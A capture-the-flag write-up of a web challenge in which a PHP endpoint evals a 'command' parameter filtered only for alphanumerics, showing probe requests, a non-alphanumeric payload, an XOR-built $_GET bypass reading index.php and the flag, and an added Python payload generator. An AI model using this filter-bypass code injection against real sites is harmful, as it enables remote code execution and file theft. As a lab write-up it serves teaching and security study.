You Shall Not EVAL:Web:782pts

You must defeat and pass through many enemies to get to it, and even then, what you desire could only be called upon with great hardship
Click here

Solution

Accessing the site only displayed the following message:

$ curl https://ch7.sbug.se/
No 'command' param received.

Supplying the parameter it asks for just triggers a complaint:

$ curl https://ch7.sbug.se/?command=whoami
Are you trying to inject malicious code?!
$ curl https://ch7.sbug.se/?command=a
Are you trying to inject malicious code?!

Since it cannot be rejecting every character, I experimented and found that symbols seem to get through (the `~~~` marks the rest of the response headers, omitted):

$ curl "https://ch7.sbug.se/?command=@" --head
HTTP/2 500
~~~
$ curl "https://ch7.sbug.se/?command='" --head
HTTP/2 500
~~~

A 500 is not much to go on, but `;` returned 200:

$ curl 'https://ch7.sbug.se/?command=;' --head
HTTP/2 200
~~~

That suggests the input is executed as code, so next I tried array syntax:

$ curl 'https://ch7.sbug.se/?command=[]^[];' --head
HTTP/2 200
~~~

It executes.
This is where PHPFuck comes to mind: PHP code written using only non-alphanumeric characters.

//printf
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
//Satoki
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
//printf(Satoki)
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

URL-encode it and run it:

$ curl 'https://ch7.sbug.se/?command=%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%
5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29;'
Satoki

Arbitrary code can now be executed, but the payloads are far too long, so the next step is to make letters usable again.
It is well known that $_ = "_GET" can be written as $_="`{{{"^"?<>/"; (byte-wise XOR of two strings of punctuation).
With $_GET[_]($_GET[__]($_GET[___])) the goal is printf(file_get_contents(index.php)), with the alphabetic parts supplied through the other query parameters, which the filter never inspects.
Since the literal $_GET cannot be written, replace it with ${$_}, giving $_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___])); and request that to retrieve the file.
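The XOR trick generalises to any target string: for each byte, pick two punctuation characters whose XOR yields it. The script below is an added example (it is not part of the original writeup) that generates such operand pairs, emulates PHP's string XOR to verify them, assembles the ${$_} payload, checks it against the same /[A-Za-z0-9]/ pattern as the challenge's index.php, and builds the final URL. The base URL https://ch7.sbug.se/ is the challenge's; the generated operands differ from the writeup's "`{{{"^"?<>/" pair but XOR to the same "_GET".

```python
import re
import urllib.parse

# Operand alphabet: printable ASCII punctuation that is safe inside a PHP
# double-quoted string. Letters/digits are rejected by the challenge filter,
# '"' would terminate the literal, '\' is the escape character, '$' would
# start variable interpolation, and whitespace is skipped for tidy URLs.
SAFE = [c for c in map(chr, range(0x21, 0x7F))
        if not c.isalnum() and c not in '"\\$']

# Same pattern as the preg_match() in the challenge's index.php.
FILTER = re.compile(r"[A-Za-z0-9]")


def php_xor(a: str, b: str) -> str:
    """Emulate PHP's string ^ string: byte-wise XOR over the shorter length."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def xor_operands(target: str) -> tuple[str, str]:
    """Find strings a, b over SAFE with a ^ b == target (first fit per byte)."""
    left, right = [], []
    for ch in target:
        for x in SAFE:
            y = chr(ord(x) ^ ord(ch))
            if y in SAFE:
                left.append(x)
                right.append(y)
                break
        else:
            raise ValueError(f"no safe XOR pair for byte {ch!r}")
    return "".join(left), "".join(right)


def passes_filter(command: str) -> bool:
    """True if the command would reach eval() in the challenge code."""
    return FILTER.search(command) is None


def build_command() -> str:
    """Return $_="..."^"...";${$_}["_"](${$_}["__"](${$_}["___"]));

    Function and argument names travel in the _, __ and ___ query
    parameters, which the filter never inspects. The keys are quoted here
    because the bare-word keys used in the writeup rely on PHP < 8 turning
    an undefined constant into a string; PHP 8 throws an Error instead.
    """
    a, b = xor_operands("_GET")
    assert php_xor(a, b) == "_GET"
    return f'$_="{a}"^"{b}";${{$_}}["_"](${{$_}}["__"](${{$_}}["___"]));'


def build_url(base: str, func: str, inner: str, path: str) -> str:
    """Assemble the full request, e.g. printf(file_get_contents(path))."""
    cmd = build_command()
    if not passes_filter(cmd):
        raise RuntimeError("generated command contains alphanumerics")
    query = urllib.parse.urlencode(
        {"command": cmd, "_": func, "__": inner, "___": path})
    return f"{base}?{query}"


if __name__ == "__main__":
    print(build_url("https://ch7.sbug.se/", "printf",
                    "file_get_contents", "../../flag"))
```

Only the `command` parameter is checked by the filter, so every alphabetic token goes into the other parameters and the XOR-built `$_GET` is the only thing the eval'd code has to spell.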

#https://ch7.sbug.se/?command=$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));&_=printf&__=file_get_contents&___=index.php
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=index.php'
<?php
        $EOL_W = "\r\n"; // Windows CR+LF
        $EOL_L = "\n";   // Linux LF
        if(isset($_GET["command"])){
                $_GET["command"] = str_replace($EOL_W, "", $_GET["command"]);
                $_GET["command"] = str_replace($EOL_L, "", $_GET["command"]);
                if(!preg_match("/[A-Za-z0-9]/is", $_GET["command"])){
                        eval($_GET["command"]);
                }else{
                        die("Are you trying to inject malicious code?!");
                }
        }else{
                die("No 'command' param received.");
        }
?>
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../../flag'
SBCTF{7h3r3_4nd_B4ck_4g41n}

Walking up the directory tree turned up the flag by luck.
If its location is unknown, use the same trick to run a shell command and search for it instead.

SBCTF{7h3r3_4nd_B4ck_4g41n}